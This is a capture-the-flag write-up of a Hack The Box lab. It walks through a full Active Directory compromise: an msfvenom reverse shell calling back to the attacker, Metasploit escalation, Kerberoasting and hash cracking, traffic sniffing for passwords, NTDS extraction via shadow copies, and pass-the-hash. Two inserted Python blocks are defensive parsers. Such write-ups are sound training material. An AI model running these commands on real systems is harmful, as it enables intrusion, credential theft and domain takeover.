Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges on them. I first made a note of all the users and the desktops they were assigned to.

I created the reverse shell payload that I wanted so that I could get a meterpreter session.

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe -o x86exploit.exe

I then proceeded to set up my msfconsole as follows.


Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine from the virtual desktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session in the background and started the suggester.

use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit.

use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the internal network, which I could see was 172.16.249.0/24, I wanted to perform a quick scan of it to identify hosts. To pivot within the internal network, I used a SOCKS proxy within msf.

use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network. Knowing the IPs of the desktops, I chose to only scan a small range, between .199 and .210.

I managed to get an additional 3 IPs:

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I decided to upload the Kerberoasting module.

Further credentials

I now wanted to see if there were any further credentials that I could find.

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt



v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we use]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc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

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this ticket hash to a file named mturner so that I could run it through hashcat.

I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsarules.git.

hashcat -m 13100 ./mturner rockyou.txt -r rules/_NSAKEY.v2.dive.rule --debug-mode=1 --debugfile=matched.rule --force -O

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!
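To make sense of what Rubeus and GetUserSPNs.py hand back, here is an added parser for the $krb5tgs$ line format (not part of the original writeup): it pulls out the account, realm, SPN and encryption type and flags RC4 (etype 23) tickets, the case the Rubeus notice above refers to, since an account without AES keys is the one whose ticket is cheapest to crack offline. The field layouts follow impacket's output convention; the sample lines are constructed with dummy checksum and ciphertext bytes.

```python
"""Parse and triage Kerberoast ticket hashes ($krb5tgs$...).

Added example, not from the original writeup. It splits the hashcat/John
formatted line that Rubeus and impacket's GetUserSPNs.py emit into the fields
a defender cares about and flags RC4 (etype 23) tickets. Field layouts follow
impacket's output convention; the sample lines below are constructed with
dummy checksum and ciphertext bytes.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Kerberos encryption type (second field of the hash) -> name, checksum length, hashcat mode.
ETYPE_NAMES = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}
CHECKSUM_HEX_LEN = {23: 32, 17: 24, 18: 24}   # 16-byte RC4 checksum, 12-byte AES checksum
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


@dataclass
class RoastedTicket:
    user: str
    realm: str
    spn: Optional[str]
    etype: int
    checksum: str
    edata: str


def parse_krb5tgs(line: str) -> RoastedTicket:
    """Split a $krb5tgs$ line into its fields; raises ValueError on malformed input."""
    parts = line.strip().split("$")[1:]          # drop the empty element before the first '$'
    if len(parts) < 6 or parts[0] != "krb5tgs" or not parts[1].isdigit():
        raise ValueError("not a $krb5tgs$ hash")
    etype = int(parts[1])
    if etype not in ETYPE_NAMES:
        raise ValueError(f"unsupported etype {etype}")
    if etype == 23:
        # $krb5tgs$23$*user$REALM$spn*$checksum$edata
        if len(parts) != 7 or not parts[2].startswith("*") or not parts[4].endswith("*"):
            raise ValueError("malformed RC4 layout")
        user, realm, spn = parts[2][1:], parts[3], parts[4][:-1]
        checksum, edata = parts[5], parts[6]
    elif len(parts) == 7 and parts[4].startswith("*") and parts[4].endswith("*"):
        # $krb5tgs$17|18$user$REALM$*spn*$checksum$edata
        user, realm, spn = parts[2], parts[3], parts[4][1:-1]
        checksum, edata = parts[5], parts[6]
    elif len(parts) == 6:
        # $krb5tgs$17|18$user$REALM$checksum$edata (SPN omitted)
        user, realm, spn = parts[2], parts[3], None
        checksum, edata = parts[4], parts[5]
    else:
        raise ValueError("malformed AES layout")
    if len(checksum) != CHECKSUM_HEX_LEN[etype] or not HEX_RE.match(checksum):
        raise ValueError("bad checksum field")
    if not edata or len(edata) % 2 or not HEX_RE.match(edata):
        raise ValueError("bad ciphertext field")
    if spn is not None:
        spn = spn.replace("~", ":")              # tools write the SPN port separator ':' as '~'
    return RoastedTicket(user, realm, spn, etype, checksum.lower(), edata.lower())


def triage(ticket: RoastedTicket) -> dict:
    """Summarise the ticket from a defender's point of view."""
    rc4 = ticket.etype == 23
    return {
        "account": f"{ticket.realm}\\{ticket.user}",
        "spn": ticket.spn,
        "etype": ETYPE_NAMES[ticket.etype],
        "hashcat_mode": HASHCAT_MODE[ticket.etype],
        # RC4 means the account has no AES keys (or RC4 was forced): fastest to crack offline.
        "weak_etype": rc4,
        "action": ("enable AES on the account and rotate it to a long random password"
                   if rc4 else "AES in use; still enforce a long, regularly rotated password"),
    }


# Constructed samples: the RC4 header mirrors the mturner ticket in the writeup; the
# checksum/ciphertext bytes are dummies. The AES sample uses a made-up service account.
SAMPLE_RC4 = ("$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$"
              + "ab" * 16 + "$" + "cd" * 40)
SAMPLE_AES = ("$krb5tgs$18$svc_example$HTB.LOCAL$*HTTP/web.htb.local*$"
              + "ab" * 12 + "$" + "cd" * 40)

if __name__ == "__main__":
    for sample in (SAMPLE_RC4, SAMPLE_AES):
        print(triage(parse_krb5tgs(sample)))
```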

SMB Access

Now that I had the new credentials I looked about a little more to see what else I could find. I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything.

proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201

This showed that we had access to read the files located in the Citrix$ share. I connected to this with smbclient to see what was inside the share.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner

I was provided with some interesting files. The 2 of interest at this point were flag.txt and private.ppk.

I downloaded these files and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a PuTTY private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in PuTTY but has a passphrase on it too. I needed to try and crack the passphrase before I could proceed. I decided to convert this with putty2john.

putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had.  I decided to look elsewhere to see what I could potentially use as a password list generator.  I found a password generator that seemed interesting and decided to run with it.  I found this at https://github.com/hashcat/kwprocessor 

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route


Once I had the password list generated, I then had to put it through john to try and crack it again.

john -w=./passes private.hash

Now that I knew the password for the file, I could convert the file for use with my system. To do this, I used puttygen.

puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the time spent gathering information I had accumulated many user IDs, and I tried all of them with the private key to get onto the SSH of the NetScaler. I then quickly found that the default username on these devices is nsroot, and attempted to log in with it.

proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdumpexamples/.

I attempted this to see if I would get any results.

tcpdump -s 0 -A -n -l | egrep -i "POST /|pwd=|passwd=|password=|Host:"


4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had access to this box as root, I wanted to perform some additional tests to see what other traffic was being passed through it. The previous flag seemed to suggest LDAP could be in use, so I set up a tcpdump to capture this for me.

tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.
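The capture step above found the password because an LDAP simple bind sends it in the clear. As an added example (not the writeup's own tooling), the following walks raw LDAP TCP payload with a minimal BER decoder and reports every simple BindRequest with the password masked, which is the check a defender would run over traffic from a device like the NetScaler to confirm whether LDAPS or signing is actually in use. The sample messages are constructed inline with the encoder shown; the DN and password are placeholders.

```python
"""Find LDAP simple binds (cleartext passwords) in captured LDAP TCP payload.

Added example, not from the original writeup: a minimal BER decoder that walks
the reassembled byte stream of an LDAP (tcp/389) session, reports each
BindRequest using simple authentication and masks the password. The sample
messages are constructed inline; the DN and password are placeholders.
"""
from typing import Iterator, Optional, Tuple

SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
APP_BIND_REQUEST = 0x60      # [APPLICATION 0], constructed
CTX_SIMPLE = 0x80            # [0], primitive: simple authentication, password in the clear


def ber(tag: int, payload: bytes) -> bytes:
    """Encode one TLV with a definite length (short or long form)."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def read_tlv(buf: bytes, off: int) -> Tuple[int, bytes, int]:
    """Decode the TLV at buf[off]; return (tag, value, offset after it) or raise ValueError."""
    if off + 2 > len(buf):
        raise ValueError("truncated header")
    tag, first, off = buf[off], buf[off + 1], off + 2
    if first & 0x80:                             # long form: next (first & 0x7F) bytes hold the length
        nlen = first & 0x7F
        if nlen == 0 or off + nlen > len(buf):
            raise ValueError("bad length")       # indefinite length is not allowed in LDAP
        length, off = int.from_bytes(buf[off:off + nlen], "big"), off + nlen
    else:
        length = first
    if off + length > len(buf):
        raise ValueError("truncated value")
    return tag, buf[off:off + length], off + length


def bind_request(msg_id: int, dn: str, password: str) -> bytes:
    """Build an LDAPv3 simple BindRequest (only used to construct the sample stream)."""
    body = (ber(INTEGER, bytes([3])) + ber(OCTET_STRING, dn.encode())
            + ber(CTX_SIMPLE, password.encode()))
    return ber(SEQUENCE, ber(INTEGER, bytes([msg_id])) + ber(APP_BIND_REQUEST, body))


def _simple_bind(msg: bytes) -> Optional[dict]:
    """Return a record if this LDAPMessage is a simple BindRequest, else None."""
    try:
        _, msg_id, pos = read_tlv(msg, 0)
        op_tag, op, _ = read_tlv(msg, pos)
        if op_tag != APP_BIND_REQUEST:
            return None                          # search, result, unbind, ...: not a bind
        _, version, pos = read_tlv(op, 0)
        _, dn, pos = read_tlv(op, pos)
        auth_tag, cred, _ = read_tlv(op, pos)
    except ValueError:
        return None                              # malformed message: skip it
    if auth_tag != CTX_SIMPLE:
        return None                              # SASL bind: no cleartext password here
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "dn": dn.decode(errors="replace"),
        "password_len": len(cred),
        "password_masked": cred[:1].decode(errors="replace") + "*" * max(len(cred) - 1, 0),
    }


def find_simple_binds(stream: bytes) -> Iterator[dict]:
    """Yield one record per simple BindRequest in a reassembled LDAP byte stream."""
    off = 0
    while off < len(stream):
        try:
            tag, msg, off = read_tlv(stream, off)
        except ValueError:
            break                                # incomplete tail: stop rather than guess
        if tag == SEQUENCE:
            hit = _simple_bind(msg)
            if hit is not None:
                yield hit


# Constructed sample stream: one simple bind followed by an UnbindRequest ([APPLICATION 2], empty).
SAMPLE_STREAM = (
    bind_request(1, "CN=svc-example,OU=Service Accounts,DC=htb,DC=local", "Pl@ceholder1")
    + ber(SEQUENCE, ber(INTEGER, bytes([2])) + bytes([0x42, 0x00]))
)
```

Feeding it a real session means reassembling the tcp/389 payload from the pcap first (e.g. with tshark's follow-stream output); any hit on a production capture is a finding, whatever the DN.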

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$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
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

The term doppelganger is a non-biologically related look-alike (Wikipedia).  This provided me with the hint of looking back at the other accounts that were active on the domain.  I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that backup-svc had the same password as the NetScaler service account. These two accounts essentially shared the same password: this was our doppelganger. I then tried to log in to the Domain Controller using WinRM through proxychains to see if I could get access, because I knew the account was a member of the Backup Operators group, which generally has access.

proxychains ruby winrm_shell_with_upload.rb


root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had, to understand what else could be achieved by simply logging in through WinRM.

whoami /priv

This was sure interesting.  It seems I had a few privileges including the Backup and Restore.  This seemed obvious though with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with backup privileges.  I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes.  This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy, including vssadmin and wbadmin. However, I then found an article which covered doing this with diskshadow. This was highlighted in the following document: https://github.com/decoder-it/whoamipriv-Hackinparis2019/blob/master/whoamiprivParis_Split.pdf

I wanted to try and get RDP access to the machine and therefore set up a portfwd to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to use xfreerdp through proxychains instead of remmina, to hopefully give myself a little more access.

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:

Once I had created the shadow copy, I could read files from it by importing the modules found at https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit
reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline I needed to extract the hashes.

python /opt/impacket/examples/secretsdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle